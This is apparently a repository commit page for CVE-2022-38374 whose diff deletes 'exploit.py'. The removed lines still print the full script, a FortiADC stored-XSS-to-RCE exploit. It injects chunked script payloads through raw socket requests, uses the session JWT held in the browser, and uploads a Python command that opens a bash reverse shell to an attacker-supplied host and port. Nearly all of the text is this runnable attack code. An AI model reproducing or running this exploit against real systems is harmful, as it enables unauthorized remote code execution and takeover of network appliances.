STRLCPY/CVE-2022-38374

Delete exploit.py
zrt committed with GitHub 1 year ago

af407bc9

1 parent 2b94b342

Total 1 files

■ ■ ■ ■ ■ ■

exploit.py

1	-	#!/usr/bin/python3
2	-
3	-	import math
4	-	import time
5	-	import socket
6	-	import base64
7	-	import argparse
8	-
9	-
10	-
11	-	def encode_all(string):
12	-	return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)
13	-
14	-	def genPayload(host, port):
15	-	data = '-----------------------------7020473452044903480265093380%0D%0AContent-Disposition: form-data; name="pyfile";filename="test.txt"%0D%0AContent-Type: text/plain%0D%0Aimport os; os.system("bash -i >& /dev/tcp/' + host + '/' + port + '0>&1")%0D%0A-----------------------------7020473452044903480265093380--'
16	-
17	-	script_url = '/ui/#navigate/Config/system/aws_scripting'
18	-	payload='''var xhr = new XMLHttpRequest();
19	-	xhr.open("POST","/ui/#navigate/Config/system/aws_scripting",true);
20	-	xhr.setRequestHeader("Authorization","Bearer " + sessionStorage["jwtoken"]);
21	-	xhr.setRequestHeader("Content-Type","multipart/form-data;boundary=---------------------------7020473452044903480265093380");
22	-	xhr.send('%s');xhr.open("GET","/api/system_aws_scripting/py_script_log?vdom=root&traffic_group=default",true);xhr.setRequestHeader("Authorization","Bearer " + sessionStorage["jwtoken"]);xhr.send();''' % data
23	-
24	-	payload=encode_all(payload)
25	-
26	-	chunks = [payload[i:i+400] for i in range(0, len(payload), 400)]
27	-
28	-	# We need to store chunks in a variable reading each row and then decode and eval it
29	-	payload=["p='';for(s=1;s<%s;s++);p+=$('table').dataTable().api().data()[s]['http_qry'];f=eval(decodeURIComponent(p))" % (len(chunks)+1)]
30	-	for i in chunks:
31	-	payload.append("%s" % i)
32	-	return payload
33	-
34	-	uri=['','','','','','','','','','']
35	-
36	-	uri+=['<script>e(e(s))', \
37	-	'<script>s=e(v)', \
38	-	'<script>u=$(d)', \
39	-	'<script>v+=d+c', \
40	-	'<script>c="()"', \
41	-	'<script>v="u.t"', \
42	-	'<script>d="ext"', \
43	-	'<ext>y"]', \
44	-	'<ext>]["http_qr', \
45	-	'<ext>t.data()[0']
46	-
47	-	uri+=['<script>e(e(y))', \
48	-	'<script>e(e(z))', \
49	-	'<script>w=$(d)', \
50	-	'<script>z+=d+c', \
51	-	'<script>c="()"', \
52	-	'<script>z="w.t"', \
53	-	'<script>d="ext"', \
54	-	'<ext>le().api()', \
55	-	'<ext>").dataTab', \
56	-	'<ext>t=$("table']
57	-
58	-	uri+=['<script>e(e(y))', \
59	-	'<script>e=eval', \
60	-	'<script>x=$(d)', \
61	-	'<script>y+=d+c', \
62	-	'<script>c="()"', \
63	-	'<script>y="x.t"', \
64	-	'<script>d="ext"', \
65	-	'<ext>).click())', \
66	-	'<ext>>$(".next"', \
67	-	'<ext>_.delay(_=']
68	-
69	-	parser = argparse.ArgumentParser(description='FortiADC XSS to RCE')
70	-	parser.add_argument('thost', metavar='thost', help='Target host')
71	-	parser.add_argument('tport', metavar='tport', help='Target port')
72	-	parser.add_argument('rhost', metavar='rhost', help='Reverse shell host')
73	-	parser.add_argument('rport', metavar='rport', help='Reverse shell port')
74	-	args = parser.parse_args()
75	-	count=0
76	-	payload = genPayload(args.rhost, args.rport)
77	-	temp = len(payload)-1
78	-
79	-	for i in uri:
80	-	if (count>=13) and (temp>=0):
81	-	data = "GET %s?%s\r\n\r\n" % (i,payload[temp])
82	-	temp-=1
83	-	time.sleep(0.1)
84	-	else:
85	-	data = "GET %s?%s\r\n\r\n" % (i,count)
86	-	time.sleep(0.1)
87	-
88	-	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
89	-	s.connect((args.thost, int(args.tport)))
90	-	s.send(str.encode(data))
91	-	s.close()
92	-	count+=1
93	-

Delete exploit.py